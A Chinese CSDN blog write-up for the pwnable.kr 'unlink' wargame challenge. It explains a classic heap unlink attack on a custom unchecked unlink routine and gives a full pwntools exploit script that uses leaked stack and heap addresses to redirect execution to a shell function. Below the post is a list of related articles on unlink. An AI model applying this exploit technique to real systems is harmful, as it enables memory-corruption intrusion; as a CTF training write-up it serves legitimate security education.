pwnable之unlink

最新推荐文章于 2023-07-01 20:30:00 发布
最新推荐文章于 2023-07-01 20:30:00 发布
阅读量643 收藏
点赞数
分类专栏: pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pwd_3/article/details/78137757
版权

问题分析

程序自己写了一个实现unlink的程序,没有任何check,并且存在堆溢出

经典的unlink attack,这里就不介绍了。

//unlink
bk_chunk = p->bk
fd_chunk = p->fd
bk_chunk->fd = fd_chunk
fd_chunk->bk = bk_chunk

solv.py

from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
cn = ssh(host='pwnable.kr',port=2222,user='unlink',password='guest')
p = cn.process('./unlink')
elf = ELF('unlink')
shell_addr = elf.symbols['shell']
#gdb.attach(p,'b unlink\n')
p.recvuntil('here is stack address leak: ')
stack_leak = p.recvuntil('\n')[:-1]
p.recvuntil('here is heap address leak: ')
heap_leak =  p.recvuntil('\n')[:-1]
stack_leak = int(stack_leak,16)
heap_leak = int(heap_leak,16)
log.info("stack leak {}".format(hex(stack_leak)))
log.info("heap leak {}".format(hex(heap_leak)))
stack2_addr = stack_leak + 0x14 - 0x8
heap2_addr = heap_leak + 0xc

payload = p32(shell_addr) + 'aaaa' * 3 +  p32(stack2_addr) + p32(heap2_addr) 
#raw_input('send payload')
p.sendline(payload)
p.interactive()
pwd_3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux文件和目录管理命令----unlink命令
redrose2100的博客
01-12 1492
unlink命令是Linux系统中一个用于删除文件的命令。与常见的rm命令不同,unlink命令不会将文件放入回收站,而是直接删除文件,并且不会提示用户确认操作,因此需要谨慎使用。
堆漏洞之unlink1
08-04
《深入理解堆漏洞:以unlink1为例》 堆漏洞是一种常见的软件安全问题,尤其是在C语言编程中,由于程序员对内存管理不当,可能导致严重的安全风险。本文将深入探讨一种名为"unlink1"的堆漏洞利用技巧,以及其在特定...
Linux下unlink函数的使用
热门推荐
judgejames的博客
11-05 4万+
一、头文件 #include<unistd.h> 二、函数原型 int unlink(const char *pathname); 三、函数介绍 unlink()函数功能即为删除文件。执行unlink()函数会删除所给参数指定的文件。 注意: 执行unlink()函数并不一定会真正的删除文件,它先会检查文件系统中此文件的连接数是否为1,如果不是1说明此文件还有其他链接对象,因此只对此文件的连接数进行减1操作。若连接数为1,并且在此时没有任何进程打开该文件......
unlink快速入门
abelxu
11-12 3129
0x01 正常unlink 当一个bin从记录bin的双向链表中被取下时,会触发unlink。常见的比如:相邻空闲bin进行合并,malloc_consolidate时。unlink的过程如下图所示(来自CTFWIKI)主要包含3个步骤,就是这么简单。 根据p的fd和bk获得双向链表的上一个chunk FD和下一个chunk BK 设置FD->bk=BK 设置BK->fd=FD 下面看一下unlink的源码。 #安装源码 apt install glibc-source #下面目录下有一个
文件删除与数据安全性:深入了解 unlink 函数
最新发布
深耕嵌入式领用多年, 致力于分享嵌入式领域技术!
07-01 982
文件删除与数据安全性:深入了解 unlink 函数
unlink - pwnable
SkYe's Blog
09-30 466
预习知识 什么是unlinked unlinked 是堆溢出中的一种常见形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。(将双向链表上的chunk卸载下来与物理chunk合并) unlink漏洞条件 有3个以上的空闲chunk链表,其中最前面的chunk存在有堆溢出 unlink的触发 当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否空闲...
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
`unlink()`, `mkdir()`, 和 `rmdir()` 是三个关键的函数,用于处理文件和目录的操作。下面将详细介绍这三个函数的用法和注意事项。 1. **unlink() 函数**: `unlink()` 用于删除指定的文件。其基本语法是 `unlink...
Linux unlink函数和删除文件的操作方法
01-09
在Linux系统中,`unlink`函数是用于删除文件或软链接的关键函数。它遵循特定的规则来决定何时真正从磁盘上移除文件内容。理解`unlink`的工作原理有助于我们更好地掌握Linux文件系统的操作。 1. **unlink函数**: `...
php unlink()函数使用教程
10-18
最近在写个网站,需要上传图片,如果修改图片,就图片就没有用了,会占用服务器的硬盘资源,所以想到用unlink函数删除旧照片.下面脚本之家小编给大家带来了php unlink()函数使用教程,感兴趣的朋友一起看看吧
zctf_2016_note3
Tw0的博客
03-16 131
heap中的unlink攻击是比较常用的技巧。后向的unlink利用条件更加简单,只需要off-by-null即可。但是前向的unlink因为需要设置伪造chunk的size,所以利用条件稍微困难一些,需要off-by-one才能实现。
unlink原理及利用
AFCC_的博客(Web_Dog)
02-27 1771
unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。但这里的前和后都是指在物理内存中的位置,而不是fd和bk链表所指向的堆块。 以当前的chunk为基准,将preivous free chunk合并到当前chunk称为向后合...
[BUUCTF pwn] pwnable_unlink
weixin_52640415的博客
01-02 661
这种题见得少,看漏了两点,不过又学了东西。 题目只给了ssh地址用户和端口号,登上去看有源码和程序,于是下下来。二进制不让cat,但是里边居然安了python,一句话生成base64,再取回来。 unlink@out:~$ ls -l total 16 -rw-r----- 1 root root 43 Jan 2 07:31 flag.txt -rwsr-sr-x 1 root root 7448 Feb 14 2020 unlink -rw-r--r-- 1 root root 772
好好说话之unlink
hollk’s blog
09-17 5344
堆溢出的第三部分unlink,这可能是有史以来我做的讲解图最多的一篇文章了~~累死~~ 。可能做pwn的人都应该听过unlink,见面都要说声久仰久仰。学unlink的时候走了一些弯路,也是遇到了很多困扰的问题,会在后面的内容中做出标注。由于写的比较详细,所以字数依然还是一如既往的多,我会在适当的时候提醒向前回顾某一处知识点,也希望在看例题的时候能够跟着一起做一下 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Tcache Stashing Unlink Attack 原理详解
qq_41252520的博客
08-06 1564
calloc\textcolor{cornflowerblue}{calloc}calloc函数是直接调用_int_malloc\textcolor{cornflowerblue}{\_int\_malloc}_int_malloc函数分配内存的,并且会清空内存 所以calloc\textcolor{cornflowerblue}{calloc}calloc可以越过 tcache取空闲内存。而malloc\textcolor{cornflowerblue}{malloc}malloc函数先是判断是否启用了
PWN之堆利用-unlink攻击
susuate的博客
07-18 1656
环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 unlink攻击
记录unlink的原理及例题分析
m0_73954357的博客
04-12 174
实现unlink攻击的条件 1 . 可以修改next_chunk的pre_size和size位 (为了绕过第一个检查,实现合并) 2 . 不能开pie (要知道需要合并的地址,所以不能开pie) 结合题目更好理解,下面给出例题(hitcontraining_bamboobox)
c语言中unlink()函数详解
Wmll1234567的博客
08-14 1万+
头文件:#include &lt;unistd.h&gt; 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连接会被删除。 返回值:成功则返回0, ...
unlink函数
05-24
unlink函数是一个系统调用,用于删除指定的文件名。它的原型如下: ```c #include int unlink(const char *pathname); ``` 其中,pathname表示要删除的文件名。 使用unlink函数删除文件时,需要注意以下几点: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值